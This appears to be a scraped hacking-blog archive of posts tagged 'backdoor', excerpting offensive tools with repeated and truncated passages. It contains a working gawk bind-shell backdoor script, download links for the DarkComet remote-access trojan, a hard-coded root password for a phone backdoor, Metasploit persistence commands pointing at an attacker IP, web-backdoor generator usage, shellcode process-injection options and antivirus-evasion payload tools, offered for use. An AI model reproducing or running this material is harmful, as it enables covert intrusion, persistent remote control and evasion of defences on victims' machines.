Please download this app. from Source.
MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.
Source: http://packetstormsecurity.org/files/114693
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Showing posts with label backdoor. Show all posts
Showing posts with label backdoor. Show all posts
Friday, 13 July 2012
MultiObfuscator 2.00
Labels:
backdoor,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
Information Security,
Network Security,
pentest,
security,
Security News,
Source,
tool,
trick,
Vulnerability
Thursday, 12 July 2012
A Backdoor in gawk by thegrugg
BEGIN {
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
Labels:
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
Information Security,
linux,
packet analysis,
pentest,
security,
shell,
Source,
tool,
trick
Saturday, 7 July 2012
DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1
This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
Labels:
backdoor,
bot,
dos,
exploitation,
Hacking,
hacking tool,
Information Security,
Microsoft,
pentest,
security,
Source,
tool,
trick,
trojan
Monday, 14 May 2012
Nice backdoor, ZTE.
The ZTE Score M is an Android 2.3.4 (Gingerbread) phone available in the United States on MetroPCS, made by Chinese telecom ZTE Corporation. There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device. Just give the magic, hard-coded password to get a root shell: $ sync_agent ztex1609523 # id
Labels:
0day,
android,
backdoor,
exploitation,
Hacking,
Information Leak,
Information Security,
pentest,
shell,
tool,
trick,
Vulnerability
Monday, 30 April 2012
Permanent Reverse Backdoor for IPhone / IPad By CoreSec
If you want to see the full detail, please go to the Source.
sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-128-CBC + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.
sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-128-CBC + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features.
Labels:
article,
backdoor,
exploitation,
Hacking,
howto,
Information Security,
iOS,
iPad,
packet analysis,
pentest,
security,
shell,
tool,
trick
Monday, 20 February 2012
Post Exploitation To Manage Firewall And Antivirus
Firewall
1. Show Firewall Operation Mode
> netsh firewall show opmode
C:\Documents and Settings\Administrator>netsh firewall show opmodeDomain profile configuration:-------------------------------------------------------------------Operational mode = EnableException mode = EnableStandard profile configuration (current):----------------------------------------
1. Show Firewall Operation Mode
> netsh firewall show opmode
C:\Documents and Settings\Administrator>netsh firewall show opmodeDomain profile configuration:-------------------------------------------------------------------Operational mode = EnableException mode = EnableStandard profile configuration (current):----------------------------------------
Labels:
article,
backdoor,
backtrack,
exploitation,
Hacking,
hacking tool,
howto,
Information Security,
metasploit,
pentest,
security,
shell,
Source,
tool,
trick
Thursday, 26 January 2012
Howto: Use WeBaCoo - Web Backdoor Cookie Script-Kit
1. Get the WeBaCoo
- git clone https://github.com/anestisb/WeBaCoo webacoo
- cd webacoo
- ./webacoo.pl -h
Usage: webacoo.pl [options]Options: -g Generate backdoor code (-o is required) -f FUNCTION PHP System function to use FUNCTION 1: system (default) 2: shell_exec 3: exec 4: passthru 5: popen -o OUTPUT Generated backdoor output filename
- git clone https://github.com/anestisb/WeBaCoo webacoo
- cd webacoo
- ./webacoo.pl -h
Usage: webacoo.pl [options]Options: -g Generate backdoor code (-o is required) -f FUNCTION PHP System function to use FUNCTION 1: system (default) 2: shell_exec 3: exec 4: passthru 5: popen -o OUTPUT Generated backdoor output filename
Labels:
article,
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
howto,
Information Security,
pentest,
security,
Source,
tool,
trick,
Web,
Web Application,
Web Application Attack
Sunday, 8 January 2012
Undetectable Backdoor Utilities and Metasploit Module
Cryptcat Project:
This is an advanced utility based on netcat and one that uses an
encryption technique with the ports of Windows, BSD and Linux.
MOCAT backdoor:
This one is based on the cryptcat project and works on client and
server phenomena, meaning it has two executables: one for windows and
the other for Linux. All communications of MOCAT are encrypted.
Ncat :
Ncat is a wonderful
Labels:
article,
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
howto,
Information Leak,
metasploit,
Network Security,
packet analysis,
pentest,
security,
shell,
Source,
tool,
trick
Howto: Run Persistence with Metasploit.
1. You can get into the victim machine with Metasploit.
2. Use the post module.
meterpreter> run persistence -U -i 5 -p attacker_port -r attacker_ip
3. If you want to change payload use -P option for that.
meterpreter> run persistence -P windows/meterpreter/reverse_https -U -p attacker_port -r attacker_ip
4. If you want to create the backdoor service in the victim machine,
Labels:
APT,
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
Information Security,
metasploit,
Network Security,
packet analysis,
pentest,
security,
shell,
Source,
tool,
trick
Thursday, 29 December 2011
Ultimate Encoder - PHP Encoder with multiple compression by lionaneesh
Ultimate Encoder" - Another Online tool by lionaneesh,
an Indian developer and Hacker. Its a PHP Encoder with multiple
compression. A Piece of code can be encoded multiple times making it
impossible for any Anti Virus to detect it
Source: http://thehackernews.com/2011/12/ultimate-encoder-php-encoder-with.html
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar
an Indian developer and Hacker. Its a PHP Encoder with multiple
compression. A Piece of code can be encoded multiple times making it
impossible for any Anti Virus to detect it
Source: http://thehackernews.com/2011/12/ultimate-encoder-php-encoder-with.html
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar
Labels:
backdoor,
bot,
Crack,
Defensive,
deobfuscate,
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
linux,
metasploit,
Network Security,
pentest,
security,
Source,
tool,
trick,
Web
Friday, 23 December 2011
inject backdoor’s shellcode into an existing process – Cymothoa
Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.
root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S
0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik
Labels:
backdoor,
Crack,
exploitation,
Hacking,
hacking tool,
howto,
Information Security,
Microsoft,
pentest,
security,
tool,
trick
Monday, 19 December 2011
Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5
This post is summary from Source. If you want to see all details please go to the Source.
CMS Identification
BlindElephant
BlindElephant is a python based tool for fingerprinting the web
applications. This tool basically attempts to discover the version used
by comparing the static files at certain known locations against the
hashes which are pre-computed for the versions of those files
CMS Identification
BlindElephant
BlindElephant is a python based tool for fingerprinting the web
applications. This tool basically attempts to discover the version used
by comparing the static files at certain known locations against the
hashes which are pre-computed for the versions of those files
Labels:
backdoor,
backtrack,
Crack,
exploitation,
Hacking,
howto,
Information Security,
metasploit,
Network Security,
pentest,
security,
shell,
Source,
sql_injection,
tool,
trick,
w3af,
Web,
Web Application
Friday, 11 November 2011
FUD Payload Generator for Backtrack By Coresec.org
Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:
#!/bin/bash
echo "************************************************************"
echo " Automatic
Labels:
APT,
backdoor,
backtrack,
Crack,
Hacking,
hacking tool,
howto,
Information Security,
Microsoft,
obfuscation,
security,
Security News